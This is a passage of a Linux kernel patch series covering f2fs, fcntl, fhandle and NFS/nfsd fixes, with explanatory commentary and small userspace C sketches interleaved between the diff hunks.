+-	__set_inode_rdev(inode, ri);
++	__set_inode_rdev(inode, node_page);
+ 
+ 	/* deleted inode */
+ 	if (inode->i_nlink == 0)
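
The __get_inode_rdev()/__set_inode_rdev() hunks above keep the long-standing
on-disk convention: addr[0] holds the old 16-bit device-number encoding,
addr[1] the new 32-bit one; only the way the address array is located
changes (via get_dnode_addr()). A userspace sketch mirroring the kernel's
old_encode_dev()/new_encode_dev():

#include <stdio.h>
#include <stdint.h>

/* old scheme: 8-bit major, 8-bit minor, in one 16-bit word */
static uint32_t old_encode(unsigned int major, unsigned int minor)
{
	return (major << 8) | minor;
}

/* new scheme: 12-bit major, 20-bit minor, split as in new_encode_dev() */
static uint32_t new_encode(unsigned int major, unsigned int minor)
{
	return (minor & 0xff) | (major << 8) | ((minor & ~0xffu) << 12);
}

int main(void)
{
	printf("old(8,1)   = 0x%04x\n", old_encode(8, 1));
	printf("new(8,1)   = 0x%08x\n", new_encode(8, 1));
	printf("new(259,5) = 0x%08x\n", new_encode(259, 5));
	return 0;
}
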
+diff --git a/fs/f2fs/node.c b/fs/f2fs/node.c
+index c6d0e07096326..fcf22a50ff5db 100644
+--- a/fs/f2fs/node.c
++++ b/fs/f2fs/node.c
+@@ -850,21 +850,29 @@ int f2fs_get_dnode_of_data(struct dnode_of_data *dn, pgoff_t index, int mode)
+ 
+ 	if (is_inode_flag_set(dn->inode, FI_COMPRESSED_FILE) &&
+ 					f2fs_sb_has_readonly(sbi)) {
+-		unsigned int c_len = f2fs_cluster_blocks_are_contiguous(dn);
++		unsigned int cluster_size = F2FS_I(dn->inode)->i_cluster_size;
++		unsigned int ofs_in_node = dn->ofs_in_node;
++		pgoff_t fofs = index;
++		unsigned int c_len;
+ 		block_t blkaddr;
+ 
++		/* should align fofs and ofs_in_node to cluster_size */
++		if (fofs % cluster_size) {
++			fofs = round_down(fofs, cluster_size);
++			ofs_in_node = round_down(ofs_in_node, cluster_size);
++		}
++
++		c_len = f2fs_cluster_blocks_are_contiguous(dn, ofs_in_node);
+ 		if (!c_len)
+ 			goto out;
+ 
+-		blkaddr = f2fs_data_blkaddr(dn);
++		blkaddr = data_blkaddr(dn->inode, dn->node_page, ofs_in_node);
+ 		if (blkaddr == COMPRESS_ADDR)
+ 			blkaddr = data_blkaddr(dn->inode, dn->node_page,
+-						dn->ofs_in_node + 1);
++						ofs_in_node + 1);
+ 
+ 		f2fs_update_read_extent_tree_range_compressed(dn->inode,
+-					index, blkaddr,
+-					F2FS_I(dn->inode)->i_cluster_size,
+-					c_len);
++					fofs, blkaddr, cluster_size, c_len);
+ 	}
+ out:
+ 	return 0;
+@@ -1587,7 +1595,7 @@ static int __write_node_page(struct page *page, bool atomic, bool *submitted,
+ 		.op_flags = wbc_to_write_flags(wbc),
+ 		.page = page,
+ 		.encrypted_page = NULL,
+-		.submitted = false,
++		.submitted = 0,
+ 		.io_type = io_type,
+ 		.io_wbc = wbc,
+ 	};
+diff --git a/fs/f2fs/recovery.c b/fs/f2fs/recovery.c
+index 53a6487f91e44..f5efc37a2b513 100644
+--- a/fs/f2fs/recovery.c
++++ b/fs/f2fs/recovery.c
+@@ -582,6 +582,19 @@ static int check_index_in_prev_nodes(struct f2fs_sb_info *sbi,
+ 	return 0;
+ }
+ 
++static int f2fs_reserve_new_block_retry(struct dnode_of_data *dn)
++{
++	int i, err = 0;
++
++	for (i = DEFAULT_FAILURE_RETRY_COUNT; i > 0; i--) {
++		err = f2fs_reserve_new_block(dn);
++		if (!err)
++			break;
++	}
++
++	return err;
++}
++
+ static int do_recover_data(struct f2fs_sb_info *sbi, struct inode *inode,
+ 					struct page *page)
+ {
+@@ -683,14 +696,8 @@ static int do_recover_data(struct f2fs_sb_info *sbi, struct inode *inode,
+ 		 */
+ 		if (dest == NEW_ADDR) {
+ 			f2fs_truncate_data_blocks_range(&dn, 1);
+-			do {
+-				err = f2fs_reserve_new_block(&dn);
+-				if (err == -ENOSPC) {
+-					f2fs_bug_on(sbi, 1);
+-					break;
+-				}
+-			} while (err &&
+-				IS_ENABLED(CONFIG_F2FS_FAULT_INJECTION));
++
++			err = f2fs_reserve_new_block_retry(&dn);
+ 			if (err)
+ 				goto err;
+ 			continue;
+@@ -698,16 +705,8 @@ static int do_recover_data(struct f2fs_sb_info *sbi, struct inode *inode,
+ 
+ 		/* dest is valid block, try to recover from src to dest */
+ 		if (f2fs_is_valid_blkaddr(sbi, dest, META_POR)) {
+-
+ 			if (src == NULL_ADDR) {
+-				do {
+-					err = f2fs_reserve_new_block(&dn);
+-					if (err == -ENOSPC) {
+-						f2fs_bug_on(sbi, 1);
+-						break;
+-					}
+-				} while (err &&
+-					IS_ENABLED(CONFIG_F2FS_FAULT_INJECTION));
++				err = f2fs_reserve_new_block_retry(&dn);
+ 				if (err)
+ 					goto err;
+ 			}
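
f2fs_reserve_new_block_retry() above replaces two open-coded loops with one
helper whose retry count is bounded by DEFAULT_FAILURE_RETRY_COUNT (8 with
fault injection, 1 without). A standalone sketch of the same bounded-retry
shape, with a hypothetical allocator that fails a few times before
succeeding:

#include <stdio.h>
#include <errno.h>

#define DEFAULT_FAILURE_RETRY_COUNT	8

static int failures_left = 3;		/* hypothetical flaky allocator */

static int reserve_new_block(void)
{
	return failures_left-- > 0 ? -EAGAIN : 0;
}

/* same shape as f2fs_reserve_new_block_retry() */
static int reserve_new_block_retry(void)
{
	int i, err = 0;

	for (i = DEFAULT_FAILURE_RETRY_COUNT; i > 0; i--) {
		err = reserve_new_block();
		if (!err)
			break;
	}
	return err;
}

int main(void)
{
	printf("result: %d\n", reserve_new_block_retry());	/* 0 */
	return 0;
}
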
+diff --git a/fs/f2fs/segment.c b/fs/f2fs/segment.c
+index 16bf9d5c8d4f9..aa1ba2fdfe00d 100644
+--- a/fs/f2fs/segment.c
++++ b/fs/f2fs/segment.c
+@@ -247,7 +247,7 @@ static int __replace_atomic_write_block(struct inode *inode, pgoff_t index,
+ 	} else {
+ 		blkcnt_t count = 1;
+ 
+-		err = inc_valid_block_count(sbi, inode, &count);
++		err = inc_valid_block_count(sbi, inode, &count, true);
+ 		if (err) {
+ 			f2fs_put_dnode(&dn);
+ 			return err;
+@@ -3312,10 +3312,10 @@ void f2fs_allocate_data_block(struct f2fs_sb_info *sbi, struct page *page,
+ 		struct f2fs_bio_info *io;
+ 
+ 		if (F2FS_IO_ALIGNED(sbi))
+-			fio->retry = false;
++			fio->retry = 0;
+ 
+ 		INIT_LIST_HEAD(&fio->list);
+-		fio->in_list = true;
++		fio->in_list = 1;
+ 		io = sbi->write_io[fio->type] + fio->temp;
+ 		spin_lock(&io->io_lock);
+ 		list_add_tail(&fio->list, &io->io_list);
+@@ -3396,7 +3396,7 @@ void f2fs_do_write_meta_page(struct f2fs_sb_info *sbi, struct page *page,
+ 		.new_blkaddr = page->index,
+ 		.page = page,
+ 		.encrypted_page = NULL,
+-		.in_list = false,
++		.in_list = 0,
+ 	};
+ 
+ 	if (unlikely(page->index >= MAIN_BLKADDR(sbi)))
+diff --git a/fs/f2fs/segment.h b/fs/f2fs/segment.h
+index f3951e8ad3948..aa9ad85e0901d 100644
+--- a/fs/f2fs/segment.h
++++ b/fs/f2fs/segment.h
+@@ -586,23 +586,22 @@ static inline bool has_curseg_enough_space(struct f2fs_sb_info *sbi,
+ 			unsigned int node_blocks, unsigned int dent_blocks)
+ {
+ 
+-	unsigned int segno, left_blocks;
++	unsigned segno, left_blocks;
+ 	int i;
+ 
+-	/* check current node segment */
++	/* check current node sections in the worst case. */
+ 	for (i = CURSEG_HOT_NODE; i <= CURSEG_COLD_NODE; i++) {
+ 		segno = CURSEG_I(sbi, i)->segno;
+-		left_blocks = f2fs_usable_blks_in_seg(sbi, segno) -
+-				get_seg_entry(sbi, segno)->ckpt_valid_blocks;
+-
++		left_blocks = CAP_BLKS_PER_SEC(sbi) -
++				get_ckpt_valid_blocks(sbi, segno, true);
+ 		if (node_blocks > left_blocks)
+ 			return false;
+ 	}
+ 
+-	/* check current data segment */
++	/* check current data section for dentry blocks. */
+ 	segno = CURSEG_I(sbi, CURSEG_HOT_DATA)->segno;
+-	left_blocks = f2fs_usable_blks_in_seg(sbi, segno) -
+-			get_seg_entry(sbi, segno)->ckpt_valid_blocks;
++	left_blocks = CAP_BLKS_PER_SEC(sbi) -
++			get_ckpt_valid_blocks(sbi, segno, true);
+ 	if (dent_blocks > left_blocks)
+ 		return false;
+ 	return true;
+@@ -651,7 +650,7 @@ static inline bool has_not_enough_free_secs(struct f2fs_sb_info *sbi,
+ 
+ 	if (free_secs > upper_secs)
+ 		return false;
+-	else if (free_secs <= lower_secs)
++	if (free_secs <= lower_secs)
+ 		return true;
+ 	return !curseg_space;
+ }
+diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
+index 0c0d0671febea..c529ce5d986cc 100644
+--- a/fs/f2fs/super.c
++++ b/fs/f2fs/super.c
+@@ -649,7 +649,7 @@ static int f2fs_set_lz4hc_level(struct f2fs_sb_info *sbi, const char *str)
+ #ifdef CONFIG_F2FS_FS_ZSTD
+ static int f2fs_set_zstd_level(struct f2fs_sb_info *sbi, const char *str)
+ {
+-	unsigned int level;
++	int level;
+ 	int len = 4;
+ 
+ 	if (strlen(str) == len) {
+@@ -663,9 +663,15 @@ static int f2fs_set_zstd_level(struct f2fs_sb_info *sbi, const char *str)
+ 		f2fs_info(sbi, "wrong format, e.g. <alg_name>:<compr_level>");
+ 		return -EINVAL;
+ 	}
+-	if (kstrtouint(str + 1, 10, &level))
++	if (kstrtoint(str + 1, 10, &level))
+ 		return -EINVAL;
+ 
++	/* f2fs does not support negative compress level now */
++	if (level < 0) {
++		f2fs_info(sbi, "do not support negative compress level: %d", level);
++		return -ERANGE;
++	}
++
+ 	if (!f2fs_is_compress_level_valid(COMPRESS_ZSTD, level)) {
+ 		f2fs_info(sbi, "invalid zstd compress level: %d", level);
+ 		return -EINVAL;
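
The zstd hunk above switches from kstrtouint() to kstrtoint() so a leading
minus sign is parsed as a negative number and can be rejected with a clear
message instead of a generic parse failure. The userspace analogue of the
pitfall is strtoul(), which happily wraps negative input; a sketch:

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
	const char *str = "-3";
	unsigned long u = strtoul(str, NULL, 10);	/* wraps around */
	long s = strtol(str, NULL, 10);			/* keeps the sign */

	printf("unsigned parse: %lu\n", u);
	printf("signed parse:   %ld\n", s);
	if (s < 0)
		printf("do not support negative compress level: %ld\n", s);
	return 0;
}
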
+diff --git a/fs/fcntl.c b/fs/fcntl.c
+index 146c9ab0cd4b7..0964e5dbf0cac 100644
+--- a/fs/fcntl.c
++++ b/fs/fcntl.c
+@@ -267,7 +267,7 @@ static int f_getowner_uids(struct file *filp, unsigned long arg)
+ }
+ #endif
+ 
+-static bool rw_hint_valid(enum rw_hint hint)
++static bool rw_hint_valid(u64 hint)
+ {
+ 	switch (hint) {
+ 	case RWH_WRITE_LIFE_NOT_SET:
+@@ -287,19 +287,17 @@ static long fcntl_rw_hint(struct file *file, unsigned int cmd,
+ {
+ 	struct inode *inode = file_inode(file);
+ 	u64 __user *argp = (u64 __user *)arg;
+-	enum rw_hint hint;
+-	u64 h;
++	u64 hint;
+ 
+ 	switch (cmd) {
+ 	case F_GET_RW_HINT:
+-		h = inode->i_write_hint;
+-		if (copy_to_user(argp, &h, sizeof(*argp)))
++		hint = inode->i_write_hint;
++		if (copy_to_user(argp, &hint, sizeof(*argp)))
+ 			return -EFAULT;
+ 		return 0;
+ 	case F_SET_RW_HINT:
+-		if (copy_from_user(&h, argp, sizeof(h)))
++		if (copy_from_user(&hint, argp, sizeof(hint)))
+ 			return -EFAULT;
+-		hint = (enum rw_hint) h;
+ 		if (!rw_hint_valid(hint))
+ 			return -EINVAL;
+ 
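
The fcntl change above validates the full u64 from userspace before it is
ever narrowed; the old code cast to enum rw_hint first and so threw away
the high bits before checking them. A sketch of the difference (RWH_MAX is
an illustrative bound, not the real constant set):

#include <stdio.h>
#include <stdint.h>

#define RWH_MAX 5	/* illustrative upper bound on valid hints */

static int hint_valid(uint64_t h)
{
	return h <= RWH_MAX;
}

int main(void)
{
	uint64_t from_user = (1ULL << 32) | 1;	/* garbage in the high bits */
	unsigned int narrowed = (unsigned int)from_user;

	/* narrowing first drops the high bits, so garbage looks valid */
	printf("narrowed %u: %s\n", narrowed,
	       hint_valid(narrowed) ? "accepted" : "rejected");
	/* validating the full u64, as the fix does, rejects it */
	printf("full u64:   %s\n",
	       hint_valid(from_user) ? "accepted" : "rejected");
	return 0;
}
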
+diff --git a/fs/fhandle.c b/fs/fhandle.c
+index f2bc27d1975e1..a8c25557c8c12 100644
+--- a/fs/fhandle.c
++++ b/fs/fhandle.c
+@@ -37,7 +37,7 @@ static long do_sys_name_to_handle(const struct path *path,
+ 	if (f_handle.handle_bytes > MAX_HANDLE_SZ)
+ 		return -EINVAL;
+ 
+-	handle = kmalloc(sizeof(struct file_handle) + f_handle.handle_bytes,
++	handle = kzalloc(sizeof(struct file_handle) + f_handle.handle_bytes,
+ 			 GFP_KERNEL);
+ 	if (!handle)
+ 		return -ENOMEM;
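
The fhandle fix above is a classic infoleak pattern: the buffer is sized
for the caller's handle_bytes, but if the filesystem fills in less than
that, kmalloc() leaves stale heap data in the tail that a later
copy_to_user() would expose; kzalloc() zeroes it up front. An illustrative
userspace sketch (malloc/calloc standing in for kmalloc/kzalloc):

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct handle_demo {			/* stand-in for struct file_handle */
	unsigned int handle_bytes;
	int handle_type;
	unsigned char f_handle[16];
};

int main(void)
{
	/* malloc() leaves stale heap bytes in place ... */
	struct handle_demo *h = malloc(sizeof(*h));

	if (!h)
		return 1;
	h->handle_bytes = 4;
	h->handle_type = 1;
	memcpy(h->f_handle, "abcd", 4);
	/* ... so f_handle[4..15] is uninitialized here: copying the
	 * whole struct to userspace would leak it (the kmalloc bug) */
	free(h);

	/* calloc() (like kzalloc()) zeroes everything up front */
	struct handle_demo *z = calloc(1, sizeof(*z));

	if (!z)
		return 1;
	printf("zeroed tail byte: %u\n", z->f_handle[15]);
	free(z);
	return 0;
}
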
+diff --git a/fs/nfs/export.c b/fs/nfs/export.c
+index 01596f2d0a1ed..9fe9586a51b71 100644
+--- a/fs/nfs/export.c
++++ b/fs/nfs/export.c
+@@ -156,7 +156,10 @@ const struct export_operations nfs_export_ops = {
+ 	.fh_to_dentry = nfs_fh_to_dentry,
+ 	.get_parent = nfs_get_parent,
+ 	.fetch_iversion = nfs_fetch_iversion,
+-	.flags = EXPORT_OP_NOWCC|EXPORT_OP_NOSUBTREECHK|
+-		EXPORT_OP_CLOSE_BEFORE_UNLINK|EXPORT_OP_REMOTE_FS|
+-		EXPORT_OP_NOATOMIC_ATTR,
++	.flags = EXPORT_OP_NOWCC		|
++		 EXPORT_OP_NOSUBTREECHK		|
++		 EXPORT_OP_CLOSE_BEFORE_UNLINK	|
++		 EXPORT_OP_REMOTE_FS		|
++		 EXPORT_OP_NOATOMIC_ATTR	|
++		 EXPORT_OP_FLUSH_ON_CLOSE,
+ };
+diff --git a/fs/nfs/flexfilelayout/flexfilelayout.c b/fs/nfs/flexfilelayout/flexfilelayout.c
+index 81bbafab18a99..4376881be7918 100644
+--- a/fs/nfs/flexfilelayout/flexfilelayout.c
++++ b/fs/nfs/flexfilelayout/flexfilelayout.c
+@@ -2016,7 +2016,7 @@ static void ff_layout_cancel_io(struct pnfs_layout_segment *lseg)
+ 	for (idx = 0; idx < flseg->mirror_array_cnt; idx++) {
+ 		mirror = flseg->mirror_array[idx];
+ 		mirror_ds = mirror->mirror_ds;
+-		if (!mirror_ds)
++		if (IS_ERR_OR_NULL(mirror_ds))
+ 			continue;
+ 		ds = mirror->mirror_ds->ds;
+ 		if (!ds)
+diff --git a/fs/nfs/nfs42.h b/fs/nfs/nfs42.h
+index b59876b01a1e3..0282d93c8bccb 100644
+--- a/fs/nfs/nfs42.h
++++ b/fs/nfs/nfs42.h
+@@ -55,11 +55,14 @@ int nfs42_proc_removexattr(struct inode *inode, const char *name);
+  * They would be 7 bytes long in the eventual buffer ("user.x\0"), and
+  * 8 bytes long XDR-encoded.
+  *
+- * Include the trailing eof word as well.
++ * Include the trailing eof word as well and make the result a multiple
++ * of 4 bytes.
+  */
+ static inline u32 nfs42_listxattr_xdrsize(u32 buflen)
+ {
+-	return ((buflen / (XATTR_USER_PREFIX_LEN + 2)) * 8) + 4;
++	u32 size = 8 * buflen / (XATTR_USER_PREFIX_LEN + 2) + 4;
++
++	return (size + 3) & ~3;
+ }
+ #endif /* CONFIG_NFS_V4_2 */
+ #endif /* __LINUX_FS_NFS_NFS4_2_H */
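
nfs42_listxattr_xdrsize() above now rounds the worst-case reply size up to
the 4-byte XDR quantum with the usual (size + 3) & ~3 trick. A runnable
sketch of the same calculation:

#include <stdio.h>
#include <stdint.h>

#define XATTR_USER_PREFIX_LEN	5	/* strlen("user.") */

/* same shape as nfs42_listxattr_xdrsize() */
static uint32_t listxattr_xdrsize(uint32_t buflen)
{
	uint32_t size = 8 * buflen / (XATTR_USER_PREFIX_LEN + 2) + 4;

	return (size + 3) & ~3u;
}

int main(void)
{
	uint32_t len;

	for (len = 7; len <= 10; len++)
		printf("buflen %2u -> xdrsize %u\n", len, listxattr_xdrsize(len));
	return 0;
}
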
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index ec3f0103e1a7f..7cc74f7451d67 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -10592,29 +10592,33 @@ const struct nfs4_minor_version_ops *nfs_v4_minor_ops[] = {
+ static ssize_t nfs4_listxattr(struct dentry *dentry, char *list, size_t size)
+ {
+ 	ssize_t error, error2, error3;
++	size_t left = size;
+ 
+-	error = generic_listxattr(dentry, list, size);
++	error = generic_listxattr(dentry, list, left);
+ 	if (error < 0)
+ 		return error;
+ 	if (list) {
+ 		list += error;
+-		size -= error;
++		left -= error;
+ 	}
+ 
+-	error2 = nfs4_listxattr_nfs4_label(d_inode(dentry), list, size);
++	error2 = nfs4_listxattr_nfs4_label(d_inode(dentry), list, left);
+ 	if (error2 < 0)
+ 		return error2;
+ 
+ 	if (list) {
+ 		list += error2;
+-		size -= error2;
++		left -= error2;
+ 	}
+ 
+-	error3 = nfs4_listxattr_nfs4_user(d_inode(dentry), list, size);
++	error3 = nfs4_listxattr_nfs4_user(d_inode(dentry), list, left);
+ 	if (error3 < 0)
+ 		return error3;
+ 
+-	return error + error2 + error3;
++	error += error2 + error3;
++	if (size && error > size)
++		return -ERANGE;
++	return error;
+ }
+ 
+ static void nfs4_enable_swap(struct inode *inode)
+diff --git a/fs/nfs/nfsroot.c b/fs/nfs/nfsroot.c
+index 620329b7e6aeb..0b1c1d2e076c1 100644
+--- a/fs/nfs/nfsroot.c
++++ b/fs/nfs/nfsroot.c
+@@ -175,10 +175,10 @@ static int __init root_nfs_cat(char *dest, const char *src,
+ 	size_t len = strlen(dest);
+ 
+ 	if (len && dest[len - 1] != ',')
+-		if (strlcat(dest, ",", destlen) > destlen)
++		if (strlcat(dest, ",", destlen) >= destlen)
+ 			return -1;
+ 
+-	if (strlcat(dest, src, destlen) > destlen)
++	if (strlcat(dest, src, destlen) >= destlen)
+ 		return -1;
+ 	return 0;
+ }
+diff --git a/fs/nfsd/filecache.c b/fs/nfsd/filecache.c
+index 697acf5c3c681..ee9c923192e08 100644
+--- a/fs/nfsd/filecache.c
++++ b/fs/nfsd/filecache.c
+@@ -74,70 +74,9 @@ static struct list_lru			nfsd_file_lru;
+ static unsigned long			nfsd_file_flags;
+ static struct fsnotify_group		*nfsd_file_fsnotify_group;
+ static struct delayed_work		nfsd_filecache_laundrette;
+-static struct rhashtable		nfsd_file_rhash_tbl
++static struct rhltable			nfsd_file_rhltable
+ 						____cacheline_aligned_in_smp;
+ 
+-enum nfsd_file_lookup_type {
+-	NFSD_FILE_KEY_INODE,
+-	NFSD_FILE_KEY_FULL,
+-};
+-
+-struct nfsd_file_lookup_key {
+-	struct inode			*inode;
+-	struct net			*net;
+-	const struct cred		*cred;
+-	unsigned char			need;
+-	bool				gc;
+-	enum nfsd_file_lookup_type	type;
+-};
+-
+-/*
+- * The returned hash value is based solely on the address of an in-code
+- * inode, a pointer to a slab-allocated object. The entropy in such a
+- * pointer is concentrated in its middle bits.
+- */
+-static u32 nfsd_file_inode_hash(const struct inode *inode, u32 seed)
+-{
+-	unsigned long ptr = (unsigned long)inode;
+-	u32 k;
+-
+-	k = ptr >> L1_CACHE_SHIFT;
+-	k &= 0x00ffffff;
+-	return jhash2(&k, 1, seed);
+-}
+-
+-/**
+- * nfsd_file_key_hashfn - Compute the hash value of a lookup key
+- * @data: key on which to compute the hash value
+- * @len: rhash table's key_len parameter (unused)
+- * @seed: rhash table's random seed of the day
+- *
+- * Return value:
+- *   Computed 32-bit hash value
+- */
+-static u32 nfsd_file_key_hashfn(const void *data, u32 len, u32 seed)
+-{
+-	const struct nfsd_file_lookup_key *key = data;
+-
+-	return nfsd_file_inode_hash(key->inode, seed);
+-}
+-
+-/**
+- * nfsd_file_obj_hashfn - Compute the hash value of an nfsd_file
+- * @data: object on which to compute the hash value
+- * @len: rhash table's key_len parameter (unused)
+- * @seed: rhash table's random seed of the day
+- *
+- * Return value:
+- *   Computed 32-bit hash value
+- */
+-static u32 nfsd_file_obj_hashfn(const void *data, u32 len, u32 seed)
+-{
+-	const struct nfsd_file *nf = data;
+-
+-	return nfsd_file_inode_hash(nf->nf_inode, seed);
+-}
+-
+ static bool
+ nfsd_match_cred(const struct cred *c1, const struct cred *c2)
+ {
+@@ -158,53 +97,16 @@ nfsd_match_cred(const struct cred *c1, const struct cred *c2)
+ 	return true;
+ }
+ 
+-/**
+- * nfsd_file_obj_cmpfn - Match a cache item against search criteria
+- * @arg: search criteria
+- * @ptr: cache item to check
+- *
+- * Return values:
+- *   %0 - Item matches search criteria
+- *   %1 - Item does not match search criteria
+- */
+-static int nfsd_file_obj_cmpfn(struct rhashtable_compare_arg *arg,
+-			       const void *ptr)
+-{
+-	const struct nfsd_file_lookup_key *key = arg->key;
+-	const struct nfsd_file *nf = ptr;
+-
+-	switch (key->type) {
+-	case NFSD_FILE_KEY_INODE:
+-		if (nf->nf_inode != key->inode)
+-			return 1;
+-		break;
+-	case NFSD_FILE_KEY_FULL:
+-		if (nf->nf_inode != key->inode)
+-			return 1;
+-		if (nf->nf_may != key->need)
+-			return 1;
+-		if (nf->nf_net != key->net)
+-			return 1;
+-		if (!nfsd_match_cred(nf->nf_cred, key->cred))
+-			return 1;
+-		if (!!test_bit(NFSD_FILE_GC, &nf->nf_flags) != key->gc)
+-			return 1;
+-		if (test_bit(NFSD_FILE_HASHED, &nf->nf_flags) == 0)
+-			return 1;
+-		break;
+-	}
+-	return 0;
+-}
+-
+ static const struct rhashtable_params nfsd_file_rhash_params = {
+ 	.key_len		= sizeof_field(struct nfsd_file, nf_inode),
+ 	.key_offset		= offsetof(struct nfsd_file, nf_inode),
+-	.head_offset		= offsetof(struct nfsd_file, nf_rhash),
+-	.hashfn			= nfsd_file_key_hashfn,
+-	.obj_hashfn		= nfsd_file_obj_hashfn,
+-	.obj_cmpfn		= nfsd_file_obj_cmpfn,
+-	/* Reduce resizing churn on light workloads */
+-	.min_size		= 512,		/* buckets */
++	.head_offset		= offsetof(struct nfsd_file, nf_rlist),
++
++	/*
++	 * Start with a single page hash table to reduce resizing churn
++	 * on light workloads.
++	 */
++	.min_size		= 256,
+ 	.automatic_shrinking	= true,
+ };
+ 
+@@ -307,27 +209,27 @@ nfsd_file_mark_find_or_create(struct nfsd_file *nf, struct inode *inode)
+ }
+ 
+ static struct nfsd_file *
+-nfsd_file_alloc(struct nfsd_file_lookup_key *key, unsigned int may)
++nfsd_file_alloc(struct net *net, struct inode *inode, unsigned char need,
++		bool want_gc)
+ {
+ 	struct nfsd_file *nf;
+ 
+ 	nf = kmem_cache_alloc(nfsd_file_slab, GFP_KERNEL);
+-	if (nf) {
+-		INIT_LIST_HEAD(&nf->nf_lru);
+-		nf->nf_birthtime = ktime_get();
+-		nf->nf_file = NULL;
+-		nf->nf_cred = get_current_cred();
+-		nf->nf_net = key->net;
+-		nf->nf_flags = 0;
+-		__set_bit(NFSD_FILE_HASHED, &nf->nf_flags);
+-		__set_bit(NFSD_FILE_PENDING, &nf->nf_flags);
+-		if (key->gc)
+-			__set_bit(NFSD_FILE_GC, &nf->nf_flags);
+-		nf->nf_inode = key->inode;
+-		refcount_set(&nf->nf_ref, 1);
+-		nf->nf_may = key->need;
+-		nf->nf_mark = NULL;
+-	}
++	if (unlikely(!nf))
++		return NULL;
++
++	INIT_LIST_HEAD(&nf->nf_lru);
++	nf->nf_birthtime = ktime_get();
++	nf->nf_file = NULL;
++	nf->nf_cred = get_current_cred();
++	nf->nf_net = net;
++	nf->nf_flags = want_gc ?
++		BIT(NFSD_FILE_HASHED) | BIT(NFSD_FILE_PENDING) | BIT(NFSD_FILE_GC) :
++		BIT(NFSD_FILE_HASHED) | BIT(NFSD_FILE_PENDING);
++	nf->nf_inode = inode;
++	refcount_set(&nf->nf_ref, 1);
++	nf->nf_may = need;
++	nf->nf_mark = NULL;
+ 	return nf;
+ }
+ 
+@@ -352,8 +254,8 @@ static void
+ nfsd_file_hash_remove(struct nfsd_file *nf)
+ {
+ 	trace_nfsd_file_unhash(nf);
+-	rhashtable_remove_fast(&nfsd_file_rhash_tbl, &nf->nf_rhash,
+-			       nfsd_file_rhash_params);
++	rhltable_remove(&nfsd_file_rhltable, &nf->nf_rlist,
++			nfsd_file_rhash_params);
+ }
+ 
+ static bool
+@@ -380,10 +282,8 @@ nfsd_file_free(struct nfsd_file *nf)
+ 	if (nf->nf_mark)
+ 		nfsd_file_mark_put(nf->nf_mark);
+ 	if (nf->nf_file) {
+-		get_file(nf->nf_file);
+-		filp_close(nf->nf_file, NULL);
+ 		nfsd_file_check_write_error(nf);
+-		fput(nf->nf_file);
++		filp_close(nf->nf_file, NULL);
+ 	}
+ 
+ 	/*
+@@ -402,13 +302,23 @@ nfsd_file_check_writeback(struct nfsd_file *nf)
+ 	struct file *file = nf->nf_file;
+ 	struct address_space *mapping;
+ 
+-	if (!file || !(file->f_mode & FMODE_WRITE))
++	/* File not open for write? */
++	if (!(file->f_mode & FMODE_WRITE))
++		return false;
++
++	/*
++	 * Some filesystems (e.g. NFS) flush all dirty data on close.
++	 * On others, there is no need to wait for writeback.
++	 */
++	if (!(file_inode(file)->i_sb->s_export_op->flags & EXPORT_OP_FLUSH_ON_CLOSE))
+ 		return false;
++
+ 	mapping = file->f_mapping;
+ 	return mapping_tagged(mapping, PAGECACHE_TAG_DIRTY) ||
+ 		mapping_tagged(mapping, PAGECACHE_TAG_WRITEBACK);
+ }
+ 
++
+ static bool nfsd_file_lru_add(struct nfsd_file *nf)
+ {
+ 	set_bit(NFSD_FILE_REFERENCED, &nf->nf_flags);
+@@ -431,7 +341,7 @@ static bool nfsd_file_lru_remove(struct nfsd_file *nf)
+ struct nfsd_file *
+ nfsd_file_get(struct nfsd_file *nf)
+ {
+-	if (likely(refcount_inc_not_zero(&nf->nf_ref)))
++	if (nf && refcount_inc_not_zero(&nf->nf_ref))
+ 		return nf;
+ 	return NULL;
+ }
+@@ -492,49 +402,26 @@ nfsd_file_dispose_list(struct list_head *dispose)
+ 	}
+ }
+ 
+-static void
+-nfsd_file_list_remove_disposal(struct list_head *dst,
+-		struct nfsd_fcache_disposal *l)
+-{
+-	spin_lock(&l->lock);
+-	list_splice_init(&l->freeme, dst);
+-	spin_unlock(&l->lock);
+-}
+-
+-static void
+-nfsd_file_list_add_disposal(struct list_head *files, struct net *net)
+-{
+-	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
+-	struct nfsd_fcache_disposal *l = nn->fcache_disposal;
+-
+-	spin_lock(&l->lock);
+-	list_splice_tail_init(files, &l->freeme);
+-	spin_unlock(&l->lock);
+-	queue_work(nfsd_filecache_wq, &l->work);
+-}
+-
+-static void
+-nfsd_file_list_add_pernet(struct list_head *dst, struct list_head *src,
+-		struct net *net)
+-{
+-	struct nfsd_file *nf, *tmp;
+-
+-	list_for_each_entry_safe(nf, tmp, src, nf_lru) {
+-		if (nf->nf_net == net)
+-			list_move_tail(&nf->nf_lru, dst);
+-	}
+-}
+-
++/**
++ * nfsd_file_dispose_list_delayed - move list of dead files to net's freeme list
++ * @dispose: list of nfsd_files to be disposed
++ *
++ * Transfers each file to the "freeme" list for its nfsd_net, to eventually
++ * be disposed of by the per-net garbage collector.
++ */
+ static void
+ nfsd_file_dispose_list_delayed(struct list_head *dispose)
+ {
+-	LIST_HEAD(list);
+-	struct nfsd_file *nf;
+-
+ 	while(!list_empty(dispose)) {
+-		nf = list_first_entry(dispose, struct nfsd_file, nf_lru);
+-		nfsd_file_list_add_pernet(&list, dispose, nf->nf_net);
+-		nfsd_file_list_add_disposal(&list, nf->nf_net);
++		struct nfsd_file *nf = list_first_entry(dispose,
++						struct nfsd_file, nf_lru);
++		struct nfsd_net *nn = net_generic(nf->nf_net, nfsd_net_id);
++		struct nfsd_fcache_disposal *l = nn->fcache_disposal;
++
++		spin_lock(&l->lock);
++		list_move_tail(&nf->nf_lru, &l->freeme);
++		spin_unlock(&l->lock);
++		queue_work(nfsd_filecache_wq, &l->work);
+ 	}
+ }
+ 
+@@ -678,8 +565,8 @@ nfsd_file_cond_queue(struct nfsd_file *nf, struct list_head *dispose)
+  * @inode:   inode on which to close out nfsd_files
+  * @dispose: list on which to gather nfsd_files to close out
+  *
+- * An nfsd_file represents a struct file being held open on behalf of nfsd. An
+- * open file however can block other activity (such as leases), or cause
++ * An nfsd_file represents a struct file being held open on behalf of nfsd.
